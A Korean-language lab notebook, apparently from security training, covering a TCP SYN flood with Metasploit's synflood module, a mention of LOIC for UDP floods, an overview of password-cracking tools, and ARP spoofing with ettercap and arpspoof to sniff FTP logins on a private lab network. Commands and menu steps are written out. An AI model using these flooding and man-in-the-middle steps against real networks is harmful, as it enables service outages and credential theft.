TCP SYN Flooding Attack

사용시스템

- Kali Linux (Attacker)

- linux200 (Web Server)

- win2008 (Web Client)

 

1. 공격시나리오1(웹서버 공격하기)

 

(linux200)
① linux200 서버에서 웹서버 구축
웹서버를 기동한다.
# pgrep -lf httpd
# service httpd restart
# chkconfig httpd on

웹페이지를 구성
# cd /var/www/html
# mkdir -p test
# echo 'Syn Flooding Test Page' > /var/www/html/test/index.html
# firefox http://192.168.20.200/test
-> 확인 후 firefox 종료

 

(win2008)
windows 2008 서버에서 웹페이지로 웹서버 페이지 확인
웹서버에 접속한다.
http://192.168.20.200
http://192.168.20.200/test

(KaliLinux)
패킷 분석을 위한 wireshark 실행
# wireshark &

 

msfconsole 실행을 위한 postgresql 실행

 

 [참고] postgresql 기동 중인지 확인하는 방법
 # service postgresql status
 # netstat -antp | grep :5432
 # nmap -p 5432 -sV localhost
 # msfconsole
 msf > db_status

 

# netstat -antp | grep :5432    (# nmap localhost)
-> postgresql 서비스 동작 중인지 점검

 

 

 [참고] 서비스 기동 방법 비교
 (redhat 계열) (부팅) # chkconfig postgresql on
                   (현재) # service postgresql start
 (debian 계열) (부팅) # update-rc.d postgresql enable
                   (현재) # service postgresql start

 

# service postgresql start

 

[메타스 플로잇 참고]
http://cr3denza.blogspot.kr/2015/03/metasploit-metasploit-metasploit.html

 

https://m.blog.naver.com/PostView.nhn?blogId=taeyoun795&logNo=220639105335&proxyReferer=http%3A%2F%2Fwww.google.co.kr%2Furl%3Fsa%3Dt%26rct%3Dj%26q%3D%26esrc%3Ds%26source%3Dweb%26cd%3D1%26ved%3D0ahUKEwjzoOrFsoLXAhWElJQKHaPbDg0QFggkMAA%26url%3Dhttp%253A%252F%252Fm.blog.naver.com%252Ftaeyoun795%252F220639105335%26usg%3DAOvVaw1l42xA0Pw2DS8Bx0EdKppF

 

msf > show auxiliary

msf > use auxiliary/dos/tcp/synflood

msf auxiliary(synflood) > show options

set RHOST 192.168.20.200

msf auxiliary(synflood) > show options

msf auxiliary(synflood) > exploit

 

 

"msf > use auxiliary/dos/tcp/synflood"
"/usr/share/metasploit-framework/modules/auxiliary/dos/tcp/synflood.rb"

 

 

[참고] UDP Flooding 공격
> loic 툴 사용(http://sourceforge.net/projects/loic/)
> windows2008 설치해서 테스트한다.(.NET Framwork 존재해야 한다.) 반드시 전제조건.

 

TCP Syn Flooding의 방어대책.

[참고] Brutus Attack & Dictionary Attac ( 무작위 대입 공격 & 사전 대입 공격 )

 

password attack
> password guessing attack : 암호 추측 공격(상대가 이 암호를 쓸거 같다 ex:도어락.)
> default password attack : 기본 암호 공격 (장비 바꾸고 암호 바꾸라 그랬는데 안바꾼?)
> dictionary attack : 사전 대입 공격
> brutus attack(brute-force attack): 무작위 대입 공격(거의 불가능)

 

password crack ( 다른 방법으로 안될 때 하는 것)
> Local password crack (offline password crack) : John The Ripper ( 서비스 중지시키고 )
> Remote password crack(online password crack)  : Hydra ( 서비스 가동 중에 )

 

사용 프로그램
- hydra(xhydra - GUI) 프로그램 사용

 

 [참고] 사전 파일 만드는 방법
 인터넷상에서 받은 사전 파일 : a.txt 
 직접 생성한 사전 파일 : b.txt
 # cat a.txt b.txt | sort –u > c.txt

 

[참고] Ettercap을 사용한 Kali Linux에서 Packet Sniffing 하기

 

용어
- Packet Sniffing ( 패킷을 중간에서 감청 )
- Packet Capture ( 지나다니는 패킷들을 지속적으로 잡아서 본다 )
- Packet Monitoring

사용시스템
- Kali Linux(Attacker)
- liux200(FTP 서버: vsftpd) 192.168.20.200
- win2008 (FTP 클라이언트: ftp CMD) 192.168.20.201

작업 시나리오
Windows2008(ftp CMD) ------ftp------> linux200(vsftpd)
    A
    |
   KaliLinux(sniffing)

[실습] ettercap –G / -T 툴을 사용하여 패킷 스니핑을 해 보자.

 

(KaliLinux)
● Ethernet Switch 환경에서 패킷을 스니핑하기 위해서는 arp spoofing 과정을 선수적으로 사용.
● ettercap 툴(arpspoof CMD)을 사용하여 arp spoofing 과정을 수행.

 ■ Ettercap 실행하는 방법
 # ettercap -G &
 or
 Kali Linux > Sniffing/Spoofing > Network Sniffers > Ettercap-graphic

① wireshark 실행
wireshark 툴을 실행.

② ethercap 툴을 실행하고 패킷 스니핑(arp spoofing + packet capture) 작업을 진행

# ettercap -G &
-------------------------------------------------
Sniff > Unified sniffing > eth1

Hosts > Scan fo hosts
Hosts > Host list

192.168.20.200 > Add to Target1
192.168.20.201 > Add to Target2

Mitm(중간자 공격) > Arp poisoning > Sniff remote connection

Start > start sniffing
-------------------------------------------------
아이피 포워딩 +

명령어를 통한 ARP Spoofing	ettercap 툴을 통한 ARP Spoofing
# nmap -F 192.168.20.0/24  # echo 1 > /proc/sys/net/ipv4/ip_forward  # arpspoof -i eth1 -t 192.168.20.200 192.168.20.201  # arpspoof -i eth1 -t 192.168.20.201 192.168.20.200	# ettercap -G &  Hosts > Scan fo hosts  192.168.20.200 > Add to Target1  192.168.20.201 > Add to Target2  Mitm > Arp poisoning > Sniff remote connection

 

명령어를 통한 ARP Spoofing
ettercap 툴을 통한 ARP Spoofing
# nmap -F 192.168.20.0/24

# echo 1 > /proc/sys/net/ipv4/ip_forward
# arpspoof -i eth1 -t 192.168.20.200 192.168.20.201
# arpspoof -i eth1 -t 192.168.20.201 192.168.20.200
# ettercap -G &
Hosts > Scan fo hosts

192.168.20.200 > Add to Target1
192.168.20.201 > Add to Target2
Mitm > Arp poisoning > Sniff remote connection

(win2008)

③ windows 2008 서버에서 ftp 명령어를 통해 linux200 서버에 접속하고 해제
c:> ftp 192.168.20.200
root 사용자로 로그인
ftp> ls
ftp> quit

(Kali Linux)

④ KaliLinux의 wireshark를 통해 패킷 분석
wireshark의 캡쳐된 패킷을 분석.
-> (Display filter : ftp)

 

 

[참고] ARP Spoofing 작업
(이전 작업)
(ㄱ) Host Sweeping : # nmap 192.168.20.0/24
(ㄴ) IP Forwarding : # echo 1 > /proc/sys/net/ipv4/ip_forward
(ㄷ) ARP Spoofing  : # arpspoof -i eth1 -t 192.168.20.200 192.168.20.201
(현재 작업)
# ettercap -G &

 

(복원) ettercap 종료
● Mitm > Stop mitm attack > 확인
● Start > Stop sniffing
● ettercap 종료